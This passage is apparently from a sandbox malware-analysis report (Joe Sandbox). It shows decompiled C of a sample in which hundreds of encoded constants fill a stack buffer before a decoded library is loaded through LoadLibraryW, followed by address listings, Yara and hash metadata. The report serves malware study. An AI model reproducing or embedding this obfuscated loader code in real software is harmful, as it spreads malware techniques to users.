				intOrPtr _v1808;
				intOrPtr _v1812;
				intOrPtr _v1816;
				intOrPtr _v1820;
				intOrPtr _v1824;
				intOrPtr _v1828;
				intOrPtr _v1832;
				intOrPtr _v1836;
				intOrPtr _v1840;
				intOrPtr _v1844;
				intOrPtr _v1848;
				intOrPtr _v1852;
				intOrPtr _v1856;
				intOrPtr _v1860;
				intOrPtr _v1864;
				intOrPtr _v1868;
				intOrPtr _v1872;
				intOrPtr _v1876;
				intOrPtr _v1880;
				intOrPtr _v1884;
				char _v1888;

				_v1888 = 0xa41c4ed0;
				_v1884 = 0x1a33c848;
				_v1880 = 0xf78674dd;
				_v1876 = 0x4d35aed;
				_v1872 = 0x5597c7b0;
				_v1868 = 0xb0ef52b0;
				_v1864 = 0x9b5bf2a7;
				_v1860 = 0xbf81a217;
				_v1856 = 0x3adcb09b;
				_v1852 = 0xe8ac849c;
				_v1848 = 0x57b96c20;
				_v1844 = 0xcd9f7235;
				_v1840 = 0xf420170d;
				_v1836 = 0x14cdf27a;
				_v1832 = 0xfd5eb0fb;
				_v1828 = 0x39318b65;
				_v1824 = 0x65d03115;
				_v1820 = 0x95260aff;
				_v1816 = 0x2e67c28e;
				_v1812 = 0xa1f4a8f4;
				_v1808 = 0xc812f1ab;
				_v1804 = 0xd934dc9c;
				_v1800 = 0xa4e6685;
				_v1796 = 0xfe213c23;
				_v1792 = 0x43c6d29;
				_v1788 = 0xcf12bcb8;
				_v1784 = 0x9f98cc3;
				_v1780 = 0xa1b2d167;
				_v1776 = 0x7fad3c40;
				_v1772 = 0xa80d3c34;
				_v1768 = 0xc8f714d7;
				_v1764 = 0x671d7785;
				_v1760 = 0x4a0ac7c8;
				_v1756 = 0x21c03928;
				_v1752 = 0x4555c0d0;
				_v1748 = 0x9834af68;
				_v1744 = 0xc6d9895d;
				_v1740 = 0xda921464;
				_v1736 = 0x6b089d64;
				_v1732 = 0xfec570b;
				_v1728 = 0xc3626a82;
				_v1724 = 0xd34a14be;
				_v1720 = 0xb7eabcaf;
				_v1716 = 0x281b3387;
				_v1712 = 0xcabf350d;
				_v1708 = 0x207d4223;
				_v1704 = 0xbc0cb804;
				_v1700 = 0xdefac10b;
				_v1696 = 0x679df176;
				_v1692 = 0x6390c0b9;
				_v1688 = 0x817bdef2;
				_v1684 = 0xcb119739;
				_v1680 = 0xd62a3fcf;
				_v1676 = 0x5b6539ee;
				_v1672 = 0x2ebc383e;
				_v1668 = 0xf6595eaa;
				_v1664 = 0xe1fa3158;
				_v1660 = 0xd81c642d;
				_v1656 = 0x5b3ff5b2;
				_v1652 = 0x25dcb5f4;
				_v1648 = 0xb74a4541;
				_v1644 = 0x65280c6a;
				_v1640 = 0x507410e2;
				_v1636 = 0x162eb7ae;
				_v1632 = 0x983fe17e;
				_v1628 = 0x1dce09e5;
				_v1624 = 0x20a01932;
				_v1620 = 0xf8c2ec13;
				_v1616 = 0xd03324ad;
				_v1612 = 0xdda4a81a;
				_v1608 = 0xefe7666e;
				_v1604 = 0x3499fe41;
				_v1600 = 0xfef05481;
				_v1596 = 0x4379be19;
				_v1592 = 0xac2a8a8c;
				_v1588 = 0xaa65ea73;
				_v1584 = 0x780f71c2;
				_v1580 = 0xbc7e1592;
				_v1576 = 0xb46dbbf2;
				_v1572 = 0x7f4481aa;
				_v1568 = 0x4c400fc5;
				_v1564 = 0xd0e27c84;
				_v1560 = 0xa0e4f48d;
				_v1556 = 0x608f4f65;
				_v1552 = 0x81e08196;
				_v1548 = 0x12e25f1;
				_v1544 = 0x108b753a;
				_v1540 = 0x734d6144;
				_v1536 = 0x2099d367;
				_v1532 = 0x4af859b5;
				_v1528 = 0x64274aa4;
				_v1524 = 0xd77c3180;
				_v1520 = 0xd07c56cd;
				_v1516 = 0x63b940a8;
				_v1512 = 0xdefbc07f;
				_v1508 = 0x1ed0b183;
				_v1504 = 0x946279a2;
				_v1500 = 0x1b4e182;
				_v1496 = 0xbd9e9d5e;
				_v1492 = 0xf895b090;
				_v1488 = 0x83ef7189;
				_v1484 = 0xdb6fdda0;
				_v1480 = 0xc43f2288;
				_v1476 = 0xfa2ee974;
				_v1472 = 0xad630715;
				_v1468 = 0x6e3f94ea;
				_v1464 = 0xc210224a;
				_v1460 = 0x5e42620a;
				_v1456 = 0xbdc03864;
				_v1452 = 0xfa898059;
				_v1448 = 0x5b223206;
				_v1444 = 0xe6ee380f;
				_v1440 = 0xe9c024a5;
				_v1436 = 0x795a214e;
				_v1432 = 0xf661e49b;
				_v1428 = 0x5d53c5b6;
				_v1424 = 0xe92e65b3;
				_v1420 = 0xe7f485b4;
				_v1416 = 0xe34b82e0;
				_v1412 = 0xaac6e570;
				_v1408 = 0xd3519085;
				_v1404 = 0x9d031edf;
				_v1400 = 0x16517768;
				_v1396 = 0x6b60337c;
				_v1392 = 0x87f162f5;
				_v1388 = 0x30b72081;
				_v1384 = 0xaf9664d7;
				_v1380 = 0xd1c1388f;
				_v1376 = 0xbaeca29b;
				_v1372 = 0x2614ddd9;
				_v1368 = 0xfd4ce0b1;
				_v1364 = 0x5c9c68b7;
				_v1360 = 0x2676eff1;
				_v1356 = 0x3d50e3a3;
				_v1352 = 0x53c809b1;
				_v1348 = 0x2d212e3b;
				_v1344 = 0x84a1010a;
				_v1340 = 0xafe995ff;
				_v1336 = 0x624ecd4e;
				_v1332 = 0xa0b9de9d;
				_v1328 = 0xf70d11ba;
				_v1324 = 0xe13ac65e;
				_v1320 = 0x94330fb1;
				_v1316 = 0x4ba9883c;
				_v1312 = 0xf9b4aa94;
				_v1308 = 0x1528153;
				_v1304 = 0xab11f915;
				_v1300 = 0xf65a3f7d;
				_v1296 = 0xf416523f;
				_v1292 = 0x622e2452;
				_v1288 = 0xe7dd6fea;
				_v1284 = 0xc53292c3;
				_v1280 = 0x341cfd;
				_v1276 = 0x1bf5cfa4;
				_v1272 = 0x3d6d8fc5;
				_v1268 = 0x882e2a5d;
				_v1264 = 0xf4dab66;
				_v1260 = 0x879777e1;
				_v1256 = 0x4235fa33;
				_v1252 = 0xf7412f63;
				_v1248 = 0x744366b8;
				_v1244 = 0x5d79780f;
				_v1240 = 0x33df1776;
				_v1236 = 0xa6b205d3;
				_v1232 = 0x7f6a7839;
				_v1228 = 0x671dbdce;
				_v1224 = 0xedb53a4e;
				_v1220 = 0x7885bf0f;
				_v1216 = 0x5d5e08dc;
				_v1212 = 0xe0da0cb9;
				_v1208 = 0x72626c3b;
				_v1204 = 0xf7523beb;
				_v1200 = 0xd3cbf7c0;
				_v1196 = 0xf397c375;
				_v1192 = 0xe8e0e8b8;
				_v1188 = 0xda2713ea;
				_v1184 = 0x61e812b;
				_v1180 = 0x1f5e76ae;
				_v1176 = 0xfcc0fd26;
				_v1172 = 0xa4f96784;
				_v1168 = 0xdfc74366;
				_v1164 = 0x4770325;
				_v1160 = 0xfcfb039;
				_v1156 = 0xbb5cd5be;
				_v1152 = 0x835bb17f;
				_v1148 = 0x45f03008;
				_v1144 = 0x8157471b;
				_v1140 = 0x92daa034;
				_v1136 = 0xc4415ba2;
				_v1132 = 0x1b6c5a77;
				_v1128 = 0x7e366518;
				_v1124 = 0x83ab0c1d;
				_v1120 = 0x397b67c4;
				_v1116 = 0xbf8a7d;
				_v1112 = 0x2e52b5be;
				_v1108 = 0x4c915e05;
				_v1104 = 0x3753c1d6;
				_v1100 = 0x95d39f06;
				_v1096 = 0x3d258823;
				_v1092 = 0x3608b8f8;
				_v1088 = 0xb4fbe8a7;
				_v1084 = 0x4c3e8f06;
				_v1080 = 0xe8794991;
				_v1076 = 0xdccaeb41;
				_v1072 = 0x9e236e45;
				_v1068 = 0xc17af71c;
				_v1064 = 0x4e7519a6;
				_v1060 = 0xc27014cc;
				_v1056 = 0x4d83d065;
				_v1052 = 0x6af34f37;
				_v1048 = 0xcd08d804;
				_v1044 = 0x3d730bc7;
				_v1040 = 0x21e8c57d;
				_v1036 = 0x317420d4;
				_v1032 = 0x6ebcf6dd;
				_v1028 = 0x7247c452;
				_v1024 = 0x690e32a5;
				_v1020 = 0x265b9d09;
				_v1016 = 0xef460e82;
				_v1012 = 0xbd38bc0;
				_v1008 = 0xce8b0c3b;
				_v1004 = 0x87b18560;
				_v1000 = 0x923ada08;
				_v996 = 0x7954f0df;
				_v992 = 0x59d4296d;
				_v988 = 0x598866b0;
				_v984 = 0x5ebed584;
				_v980 = 0x75f303ed;
				_v976 = 0x4bd185df;
				_v972 = 0x90668e75;
				_v968 = 0xef0ec6ee;
				_v964 = 0xfb160c3c;
				_v960 = 0xdddf860c;
				_v956 = 0xe3ec7c97;
				_v952 = 0xd84fe87a;
				_v948 = 0x4eebf6de;
				_v944 = 0x6598361e;
				_v940 = 0x2d4f37a9;
				_v936 = 0x20c189e8;
				_v932 = 0x1da649ac;
				_v928 = 0xbb2d17b0;
				_v924 = 0x7365b2a6;
				_v920 = 0x748039dd;
				_v916 = 0x40abf8ad;
				_v912 = 0xc2230aa3;
				_v908 = 0xddc9542f;
				_v904 = 0xd5cbbac;
				_v900 = 0x44de193b;
				_v896 = 0xe51fd5ad;
				_v892 = 0xf9739bdf;
				_v888 = 0xf511941f;
				_v884 = 0xbb4c8f97;
				_v880 = 0x71f29f4a;
				_v876 = 0xf93e7335;
				_v872 = 0xb3d5a235;
				_v868 = 0x8bf5639b;
				_v864 = 0xb678715c;
				_v860 = 0x1681d985;
				_v856 = 0xce6e3dde;
				_v852 = 0x5962f64c;
				_v848 = 0x1b0fea51;
				_v844 = 0xf304da7f;
				_v840 = 0x60dd60fc;
				_v836 = 0x4894e820;
				_v832 = 0xd4c5e951;
				_v828 = 0xbc0c6801;
				_v824 = 0x1b410e8d;
				_v820 = 0x9d4beae1;
				_v816 = 0xb4470101;
				_v812 = 0xefc6595c;
				_v808 = 0x1942297a;
				_v804 = 0x452f53c1;
				_v800 = 0x60736a8a;
				_v796 = 0x1cb5c8c2;
				_v792 = 0xa3b92496;
				_v788 = 0x3604e2c0;
				_v784 = 0x7d04dd0b;
				_v780 = 0xf93943b2;
				_v776 = 0xa34c9da0;
				_v772 = 0x16093c22;
				_v768 = 0x6230157f;
				_v764 = 0xf80a9182;
				_v760 = 0x9d202d62;
				_v756 = 0x58881b4d;
				_v752 = 0x7261191d;
				_v748 = 0xee6a2a6f;
				_v744 = 0x8b6ed692;
				_v740 = 0xf4ad89c5;
				_v736 = 0x902f328c;
				_v732 = 0xdae187c2;
				_v728 = 0x84c69aaf;
				_v724 = 0x8b583ddc;
				_v720 = 0x3154736a;
				_v716 = 0xf0ba94f8;
				_v712 = 0x371d3c0;
				_v708 = 0x9490ef0f;
				_v704 = 0x2d449fdf;
				_v700 = 0xb6d886dd;
				_v696 = 0x34ac4b5b;
				_v692 = 0x4add82f5;
				_v688 = 0x5643055a;
				_v684 = 0xedb6a896;
				_v680 = 0xf3b73e97;
				_v676 = 0xcd8bf45d;
				_v672 = 0x93a0ea35;
				_v668 = 0xf51d7bfd;
				_v664 = 0xd083f728;
				_v660 = 0x5978c810;
				_v656 = 0xacfb548d;
				_v652 = 0x681791b;
				_v648 = 0xab7f89b7;
				_v644 = 0x4f840277;
				_v640 = 0x45cf5527;
				_v636 = 0xafbc6fa5;
				_v632 = 0x7709f48f;
				_v628 = 0x8685cbd3;
				_v624 = 0x39eebbf5;
				_v620 = 0x5d1c8064;
				_v616 = 0x20fe1dce;
				_v612 = 0x69db75cc;
				_v608 = 0x9b65dc5a;
				_v604 = 0x27934866;
				_v600 = 0xf19b8bb6;
				_v596 = 0x887f0721;
				_v592 = 0x679fda8;
				_v588 = 0x78284a0;
				_v584 = 0x265fdb89;
				_v580 = 0x73ed0821;
				_v576 = 0x7d12f58b;
				_v572 = 0xc29cc904;
				_v568 = 0xf8cd14ad;
				_v564 = 0x5a59d9e2;
				_v560 = 0xa4ddcf31;
				_v556 = 0x91ce662e;
				_v552 = 0xc476dab;
				_v548 = 0xe8647b34;
				_v544 = 0x7a59bdcd;
				_v540 = 0xff29671e;
				_v536 = 0x37ab0d4d;
				_v532 = 0x3b7b2c58;
				_v528 = 0xdaca9837;
				_v524 = 0x5d95c73f;
				_v520 = 0x8d2d8ef2;
				_v516 = 0xe3a7eb3d;
				_v512 = 0x93410f8b;
				_v508 = 0x40690df9;
				_v504 = 0x56050e5c;
				_v500 = 0xdf7e7ef6;
				_v496 = 0xe57bff2d;
				_v492 = 0x8053dea3;
				_v488 = 0xca387b31;
				_v484 = 0x32eccb66;
				_v480 = 0xafb3b6b8;
				_v476 = 0x8f23f2d6;
				_v472 = 0x5fd00aa;
				_v468 = 0x7ba3d053;
				_v464 = 0xbed15460;
				_v460 = 0x91a7f84b;
				_v456 = 0x509deafe;
				_v452 = 0x8be07147;
				_v448 = 0x2a1903f7;
				_v444 = 0x74e13ee;
				_v440 = 0x46703439;
				_v436 = 0xf34281b8;
				_v432 = 0x88689edc;
				_v428 = 0xae06c319;
				_v424 = 0x809e0f7;
				_v420 = 0x32e2a63c;
				_v416 = 0x351aba4e;
				_v412 = 0x6bda9779;
				_v408 = 0xff25d6b;
				_v404 = 0xf19e2b12;
				_v400 = 0xe09ee902;
				_v396 = 0x30162918;
				_v392 = 0xf554291d;
				_v388 = 0xd293bf0c;
				_v384 = 0xa5aaa34d;
				_v380 = 0x18af0b32;
				_v376 = 0x45d3b443;
				_v372 = 0x8a8542bb;
				_v368 = 0xb2938f72;
				_v364 = 0x375b0514;
				_v360 = 0xa0175b99;
				_v356 = 0xab05d150;
				_v352 = 0xb2ab1a30;
				_v348 = 0xe6d1d6f1;
				_v344 = 0x5bc1d28d;
				_v340 = 0x31ab7862;
				_v336 = 0xb32f6993;
				_v332 = 0x3bff57b5;
				_v328 = 0xf4362081;
				_v324 = 0xa41ea41;
				_v320 = 0xf5554d12;
				_v316 = 0xe74be567;
				_v312 = 0xdda94f36;
				_v308 = 0x9942b8d7;
				_v304 = 0xa73018e6;
				_v300 = 0x65aa1921;
				_v296 = 0xa0ad1bda;
				_v292 = 0xfa54f506;
				_v288 = 0x36d533d2;
				_v284 = 0x2a17a738;
				_v280 = 0x24a73c55;
				_v276 = 0x25c6e7c;
				_v272 = 0x792542e6;
				_v268 = 0x60fe3e84;
				_v264 = 0xe894fa28;
				_v260 = 0xa8c3bd02;
				_v256 = 0xdec79a5c;
				_v252 = 0xaeea5367;
				_v248 = 0x9618cdf9;
				_v244 = 0x4d53bb98;
				_v240 = 0xc82415fb;
				_v236 = 0x311045a0;
				_v232 = 0x435d92ea;
				_v228 = 0x64d81a20;
				_v224 = 0x1a745c98;
				_v220 = 0xbb1cacab;
				_v216 = 0xb68b62f7;
				_v212 = 0x2262a170;
				_v208 = 0x244f7cd;
				_v204 = 0x634247e8;
				_v200 = 0x8e6f29ce;
				_v196 = 0xc125d02b;
				_v192 = 0xe1fb1246;
				_v188 = 0x90ff749d;
				_v184 = 0x9d49b7a9;
				_v180 = 0x8ae4cd18;
				_v176 = 0xdc3b0e33;
				_v172 = 0x5357343f;
				_v168 = 0x9078d775;
				_v164 = 0x7cd42af4;
				_v160 = 0x85875278;
				_v156 = 0xe098b691;
				_v152 = 0xdd539cbf;
				_v148 = 0x7b6915e6;
				_v144 = 0xdfa72c20;
				_v140 = 0x15af0b24;
				_v136 = 0x1e90183d;
				_v132 = 0xae2521d9;
				_v128 = 0x132fe8d2;
				_v124 = 0x7628aa01;
				_v120 = 0xf98981af;
				_v116 = 0xdeee782f;
				_v112 = 0x7ff5b8f;
				_v108 = 0x3a7c246a;
				_v104 = 0x8c6af67;
				_v100 = 0x27178fff;
				_v96 = 0x40ce6aac;
				_v92 = 0xe05cdea;
				_v88 = 0x1a09cd63;
				_v84 = 0x4ab557a2;
				_v80 = 0x578e6083;
				_v76 = 0x73ab4d0a;
				_v72 = 0x4577df03;
				_v68 = 0x388ee30c;
				_v64 = 0xa6a001f8;
				_v60 = 0xa362abb;
				_v56 = 0x4c361001;
				_v52 = 0x52b9ecf;
				_v48 = 0xf779ca4b;
				_v44 = 0xf0d67399;
				_v40 = 0x26e6d555;
				_v36 = 0xda742f2c;
				_v32 = 0x945c9d84;
				_v28 = 0x85b2d426;
				_v24 = 0x3e9987ee;
				_v20 = 0x9c588149;
				_v16 = 0x5b70fee9;
				_v12 = 0x724f6ac9;
				_v8 = 0x3e06e993;
				_t482 = E00401A52(0x412320, 0x72fc3a35);
				 *0x4164ec = LoadLibraryW(_t473);
				L00401B09(_t482);
				_push(0x414710);
				_push(0x81c5b25);
				return E004012FF( *0x4164ec,  &_v1888, 0x1d7);
			}


























































































































































































































































































































































































































































































                  0x004076d0
                  0x004076da
                  0x004076e4
                  0x004076ee
                  0x004076f8
                  0x00407702
                  0x0040770c
                  0x00407716
                  0x00407720
                  0x0040772a
                  0x00407734
                  0x0040773e
                  0x00407748
                  0x00407752
                  0x0040775c
                  0x00407766
                  0x00407770
                  0x0040777a
                  0x00407784
                  0x0040778e
                  0x00407798
                  0x004077a2
                  0x004077ac
                  0x004077b6
                  0x004077c0
                  0x004077ca
                  0x004077d4
                  0x004077de
                  0x004077e8
                  0x004077f2
                  0x004077fc
                  0x00407806
                  0x00407810
                  0x0040781a
                  0x00407824
                  0x0040782e
                  0x00407838
                  0x00407842
                  0x0040784c
                  0x00407856
                  0x00407860
                  0x0040786a
                  0x00407874
                  0x0040787e
                  0x00407888
                  0x00407892
                  0x0040789c
                  0x004078a6
                  0x004078b0
                  0x004078ba
                  0x004078c4
                  0x004078ce
                  0x004078d8
                  0x004078e2
                  0x004078ec
                  0x004078f6
                  0x00407900
                  0x0040790a
                  0x00407914
                  0x0040791e
                  0x00407928
                  0x00407932
                  0x0040793c
                  0x00407946
                  0x00407950
                  0x0040795a
                  0x00407964
                  0x0040796e
                  0x00407978
                  0x00407982
                  0x0040798c
                  0x00407996
                  0x004079a0
                  0x004079aa
                  0x004079b4
                  0x004079be
                  0x004079c8
                  0x004079d2
                  0x004079dc
                  0x004079e6
                  0x004079f0
                  0x004079fa
                  0x00407a04
                  0x00407a0e
                  0x00407a18
                  0x00407a22
                  0x00407a2c
                  0x00407a36
                  0x00407a40
                  0x00407a4a
                  0x00407a54
                  0x00407a5e
                  0x00407a68
                  0x00407a72
                  0x00407a7c
                  0x00407a86
                  0x00407a90
                  0x00407a9a
                  0x00407aa4
                  0x00407aae
                  0x00407ab8
                  0x00407ac2
                  0x00407acc
                  0x00407ad6
                  0x00407ae0
                  0x00407aea
                  0x00407af4
                  0x00407afe
                  0x00407b08
                  0x00407b12
                  0x00407b1c
                  0x00407b26
                  0x00407b30
                  0x00407b3a
                  0x00407b44
                  0x00407b4e
                  0x00407b58
                  0x00407b62
                  0x00407b6c
                  0x00407b76
                  0x00407b80
                  0x00407b8a
                  0x00407b94
                  0x00407b9e
                  0x00407ba8
                  0x00407bb2
                  0x00407bbc
                  0x00407bc6
                  0x00407bd0
                  0x00407bda
                  0x00407be4
                  0x00407bee
                  0x00407bf8
                  0x00407c02
                  0x00407c0c
                  0x00407c16
                  0x00407c20
                  0x00407c2a
                  0x00407c34
                  0x00407c3e
                  0x00407c48
                  0x00407c52
                  0x00407c5c
                  0x00407c66
                  0x00407c70
                  0x00407c7a
                  0x00407c84
                  0x00407c8e
                  0x00407c98
                  0x00407ca2
                  0x00407cac
                  0x00407cb6
                  0x00407cc0
                  0x00407cca
                  0x00407cd4
                  0x00407cde
                  0x00407ce8
                  0x00407cf2
                  0x00407cfc
                  0x00407d06
                  0x00407d10
                  0x00407d1a
                  0x00407d24
                  0x00407d2e
                  0x00407d38
                  0x00407d42
                  0x00407d4c
                  0x00407d56
                  0x00407d60
                  0x00407d6a
                  0x00407d74
                  0x00407d7e
                  0x00407d88
                  0x00407d92
                  0x00407d9c
                  0x00407da6
                  0x00407db0
                  0x00407dba
                  0x00407dc4
                  0x00407dce
                  0x00407dd8
                  0x00407de2
                  0x00407dec
                  0x00407df6
                  0x00407e00
                  0x00407e0a
                  0x00407e14
                  0x00407e1e
                  0x00407e28
                  0x00407e32
                  0x00407e3c
                  0x00407e46
                  0x00407e50
                  0x00407e5a
                  0x00407e64
                  0x00407e6e
                  0x00407e78
                  0x00407e82
                  0x00407e8c
                  0x00407e96
                  0x00407ea0
                  0x00407eaa
                  0x00407eb4
                  0x00407ebe
                  0x00407ec8
                  0x00407ed2
                  0x00407edc
                  0x00407ee6
                  0x00407ef0
                  0x00407efa
                  0x00407f04
                  0x00407f0e
                  0x00407f18
                  0x00407f22
                  0x00407f2c
                  0x00407f36
                  0x00407f40
                  0x00407f4a
                  0x00407f54
                  0x00407f5e
                  0x00407f68
                  0x00407f72
                  0x00407f7c
                  0x00407f86
                  0x00407f90
                  0x00407f9a
                  0x00407fa4
                  0x00407fae
                  0x00407fb8
                  0x00407fc2
                  0x00407fcc
                  0x00407fd6
                  0x00407fe0
                  0x00407fea
                  0x00407ff4
                  0x00407ffe
                  0x00408008
                  0x00408012
                  0x0040801c
                  0x00408026
                  0x00408030
                  0x0040803a
                  0x00408044
                  0x0040804e
                  0x00408058
                  0x00408062
                  0x0040806c
                  0x00408076
                  0x00408080
                  0x0040808a
                  0x00408094
                  0x0040809e
                  0x004080a8
                  0x004080b2
                  0x004080bc
                  0x004080c6
                  0x004080d0
                  0x004080da
                  0x004080e4
                  0x004080ee
                  0x004080f8
                  0x00408102
                  0x0040810c
                  0x00408116
                  0x00408120
                  0x0040812a
                  0x00408134
                  0x0040813e
                  0x00408148
                  0x00408152
                  0x0040815c
                  0x00408166
                  0x00408170
                  0x0040817a
                  0x00408184
                  0x0040818e
                  0x00408198
                  0x004081a2
                  0x004081ac
                  0x004081b6
                  0x004081c0
                  0x004081ca
                  0x004081d4
                  0x004081de
                  0x004081e8
                  0x004081f2
                  0x004081fc
                  0x00408206
                  0x00408210
                  0x0040821a
                  0x00408224
                  0x0040822e
                  0x00408238
                  0x00408242
                  0x0040824c
                  0x00408256
                  0x00408260
                  0x0040826a
                  0x00408274
                  0x0040827e
                  0x00408288
                  0x00408292
                  0x0040829c
                  0x004082a6
                  0x004082b0
                  0x004082ba
                  0x004082c4
                  0x004082ce
                  0x004082d8
                  0x004082e2
                  0x004082ec
                  0x004082f6
                  0x00408300
                  0x0040830a
                  0x00408314
                  0x0040831e
                  0x00408328
                  0x00408332
                  0x0040833c
                  0x00408346
                  0x00408350
                  0x0040835a
                  0x00408364
                  0x0040836e
                  0x00408378
                  0x00408382
                  0x0040838c
                  0x00408396
                  0x004083a0
                  0x004083aa
                  0x004083b4
                  0x004083be
                  0x004083c8
                  0x004083d2
                  0x004083dc
                  0x004083e6
                  0x004083f0
                  0x004083fa
                  0x00408404
                  0x0040840e
                  0x00408418
                  0x00408422
                  0x0040842c
                  0x00408436
                  0x00408440
                  0x0040844a
                  0x00408454
                  0x0040845e
                  0x00408468
                  0x00408472
                  0x0040847c
                  0x00408486
                  0x00408490
                  0x0040849a
                  0x004084a4
                  0x004084ae
                  0x004084b8
                  0x004084c2
                  0x004084cc
                  0x004084d6
                  0x004084e0
                  0x004084ea
                  0x004084f4
                  0x004084fe
                  0x00408508
                  0x00408512
                  0x0040851c
                  0x00408526
                  0x00408530
                  0x0040853a
                  0x00408544
                  0x0040854e
                  0x00408558
                  0x00408562
                  0x0040856c
                  0x00408576
                  0x00408580
                  0x0040858a
                  0x00408594
                  0x0040859e
                  0x004085a8
                  0x004085b2
                  0x004085bc
                  0x004085c6
                  0x004085d0
                  0x004085da
                  0x004085e4
                  0x004085ee
                  0x004085f8
                  0x00408602
                  0x0040860c
                  0x00408616
                  0x00408620
                  0x0040862a
                  0x00408634
                  0x0040863e
                  0x00408648
                  0x00408652
                  0x0040865c
                  0x00408666
                  0x00408670
                  0x0040867a
                  0x00408684
                  0x0040868e
                  0x0040869d
                  0x004086ac
                  0x004086b6
                  0x004086c0
                  0x004086ca
                  0x004086d4
                  0x004086de
                  0x004086e8
                  0x004086f2
                  0x004086fc
                  0x00408706
                  0x00408710
                  0x0040871a
                  0x00408724
                  0x0040872e
                  0x00408738
                  0x00408742
                  0x0040874c
                  0x00408756
                  0x00408760
                  0x0040876a
                  0x00408774
                  0x0040877e
                  0x00408788
                  0x00408792
                  0x0040879c
                  0x004087a6
                  0x004087b0
                  0x004087ba
                  0x004087c4
                  0x004087ce
                  0x004087d8
                  0x004087e2
                  0x004087ec
                  0x004087f6
                  0x00408800
                  0x00408807
                  0x0040880e
                  0x00408815
                  0x0040881c
                  0x00408823
                  0x0040882a
                  0x00408831
                  0x00408838
                  0x0040883f
                  0x00408846
                  0x0040884d
                  0x00408854
                  0x0040885b
                  0x00408862
                  0x00408869
                  0x00408870
                  0x00408877
                  0x0040887e
                  0x00408885
                  0x0040888c
                  0x00408893
                  0x0040889a
                  0x004088a1
                  0x004088a8
                  0x004088af
                  0x004088b6
                  0x004088bd
                  0x004088c4
                  0x004088cb
                  0x004088d2
                  0x004088d9
                  0x004088e5
                  0x004088f0
                  0x004088f5
                  0x00408906
                  0x0040890b
                  0x00408921

                  APIs
                  • LoadLibraryW.KERNEL32(00000000), ref: 004088E8
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: bB^$#B} $4{d$94pF$;.!-$;lbr$?4WS$AA$DaMs$N!Zy$R$.b$X,{;$gK$j$|:$jsT1$nf$o*j$|3`k$9e[$B%y$GBc
                  • API String ID: 1029625771-3166147023
                  • Opcode ID: dd96afa55d8e9e932a96e5fe82667a6c913e1731f0611b2d86c11fa43710962e
                  • Instruction ID: 7dcabeb444d3c38dde185443b52466955599dc9d20e08e1f97c3b9dafdfd80e0
                  • Opcode Fuzzy Hash: dd96afa55d8e9e932a96e5fe82667a6c913e1731f0611b2d86c11fa43710962e
                  • Instruction Fuzzy Hash: 9B82B4F0C467698FDB618F429E8438EBA75BB51345F5096C9C29C3A204CB750BC2CF89
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 00408CD5, Relevance: 33.7, APIs: 1, Strings: 18, Instructions: 413libraryUNIQUE
                  Download Yara Rule

                  Control-flow Graph

                  C-Code - Quality: 83%
                  			E00408CD5(void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				intOrPtr _v308;
				intOrPtr _v312;
				intOrPtr _v316;
				intOrPtr _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				intOrPtr _v336;
				intOrPtr _v340;
				intOrPtr _v344;
				intOrPtr _v348;
				intOrPtr _v352;
				intOrPtr _v356;
				intOrPtr _v360;
				intOrPtr _v364;
				intOrPtr _v368;
				intOrPtr _v372;
				intOrPtr _v376;
				intOrPtr _v380;
				intOrPtr _v384;
				intOrPtr _v388;
				intOrPtr _v392;
				intOrPtr _v396;
				intOrPtr _v400;
				intOrPtr _v404;
				intOrPtr _v408;
				intOrPtr _v412;
				intOrPtr _v416;
				intOrPtr _v420;
				intOrPtr _v424;
				intOrPtr _v428;
				intOrPtr _v432;
				intOrPtr _v436;
				intOrPtr _v440;
				intOrPtr _v444;
				intOrPtr _v448;
				intOrPtr _v452;
				intOrPtr _v456;
				intOrPtr _v460;
				intOrPtr _v464;
				intOrPtr _v468;
				intOrPtr _v472;
				intOrPtr _v476;
				intOrPtr _v480;
				intOrPtr _v484;
				intOrPtr _v488;
				intOrPtr _v492;
				intOrPtr _v496;
				intOrPtr _v500;
				intOrPtr _v504;
				intOrPtr _v508;
				intOrPtr _v512;
				intOrPtr _v516;
				intOrPtr _v520;
				intOrPtr _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
